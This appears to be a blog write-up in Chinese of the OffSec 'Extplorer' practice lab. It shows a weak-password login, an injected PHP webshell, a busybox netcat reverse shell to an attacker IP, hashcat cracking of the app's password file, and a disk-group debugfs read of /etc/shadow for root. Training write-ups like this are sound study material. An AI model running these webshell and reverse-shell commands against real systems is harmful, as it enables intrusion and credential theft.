OSCP Extplorer Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Extplorer

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

目录枚举 –> Extplorer 后台弱口令 –> 后台编辑文件写入 webshell –> www-data 用户权限 –> web 用户密码配置文件(.htusers.php),hashcat 破解 –> dora 用户权限 –> 用户旗帜

权限提升:

dora Disk 组权限 –> 读取 shadow 文件并破解 –> root 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
sudo nmap -p- 192.168.230.16 --min-rate=2000

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
sudo nmap -p22,80 -sCV 192.168.230.16

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

系统为 Linux 环境,开放有 HTTP、SSH 服务。

3.2 渗透测试突破边界

3.2.1 Extplorer 弱口令、后台 RCE

访问系统 HTTP 80 端口,发现会自动跳转至 WordPress 安装目录,但并不能执行安装(兔子洞)。

使用 dirsearch 进行目录枚举,发现了 filemanager 目录。

1
dirsearch -u http://192.168.230.16

访问 filemanager 目录,发现目录运行了 Extplorer 应用,使用弱口令可登录后台,且后台具有代码编辑功能。

1
admin/admin

在 index.php 添加命令执行函数。

1
system($_GET['cmd']);

kali 监听 1234 端口,然后利用 index.php 执行反弹 shell,成功获取到系统 www-data 用户 shell。

1
2
nc -lvnp 1234
http://192.168.230.16/index.php?cmd=busybox%20nc%20192.168.45.155%201234%20-e%20/bin/bash

升级为交互式 shell。

3.3.2 Extplorer 用户配置文件密码破解

在 dora 用户家目录发现了用户旗帜,但 www-data 用户没有权限读取。

在访问 web 后台时,会提示我们系统用户信息,其中包含了 dora 用户,接下来尝试查找网站的 dora 用户密码信息。

检索 Extplorer 后台密码配置,发现可能保存在网站的/config/.htusers.php 文件中。

1
2
extplorer password file
https://extplorer.net/projects/extplorer/wiki/Getting_Started/diff?utf8=%E2%9C%93&version=4&version_from=3

1
cat /var/www/html/filemanager/config/.htusers.php

将密文部分保存至 kali,使用 hashcat 破解,得到了 dora 用户明文密码。

1
hashcat hash ~/Desktop/rockyou.txt -m 3200

使用 su 命令切换至 dora 用户。

3.2.3 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 Dora Disk 组权限查看系统 shadow 文件并成功破解 root 密码

查看 dora 用户 ID 时,发现用户属于 disk 组,该组成员可查看系统任意文件内容,利用该配置可查看 root 用户私钥文件或系统 shadow 文件。

参考链接:

1
https://book.hacktricks.wiki/zh/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#disk-group

1
df -h

1
2
3
# 系统 root 用户没有私钥文件,而且利用该组权限不能写入私钥
debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
cat /etc/shadow

将 shadow 文件中 root 用户密码整行保存至 kali,使用 hashcat 破解,得到了系统 root 用户密码。

1
hashcat hashs ~/Desktop/rockyou.txt

使用 su 切换至 root 用户。

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨

OffSec OSCP
#Linux #弱口令 #Linux Disk 组权限滥用
OSCP Extplorer Write-up
https://www.f0nesec.top/2025/08/24/oscp-extplorer/
作者
F0ne
发布于
2025年8月24日
许可协议